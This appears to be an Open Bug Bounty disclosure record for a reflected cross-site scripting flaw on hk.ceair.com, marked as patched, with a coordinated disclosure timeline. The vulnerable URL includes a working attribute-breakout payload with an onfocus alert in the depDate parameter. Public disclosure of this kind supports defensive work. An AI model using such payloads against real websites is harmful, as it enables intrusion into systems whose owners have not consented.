hk.ceair.com XSS vulnerability

2017-10-04T13:56:00
ID OBB:322661
Type openbugbounty
Reporter amlnspqr
Modified 2018-01-03T03:44:00

Description

Vulnerable URL:
http://hk.ceair.com/muovc/newsitefront/reservation/flight-search-by-shopping!doFlightSearch.shtml?cond.tripType=OW&cond.depCode_reveal=xxx&cond.depCode=&cond.arrCode_reveal=xxx&cond.arrCode=&cond.routeType=&depDate="autofocus onfocus="alert(/XSSPOSED/)"
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 4 October, 2017 13:56 GMT
Generic security notifications sent to website owner| 4 October, 2017 13:58 GMT
Notification sent to subscribers (without technical details)| 4 October, 2017 14:17 GMT
Vulnerability details disclosed by researcher| 2 January, 2018 14:24 GMT
Vulnerability patched by the website owner| 3 January, 2018 03:44 GMT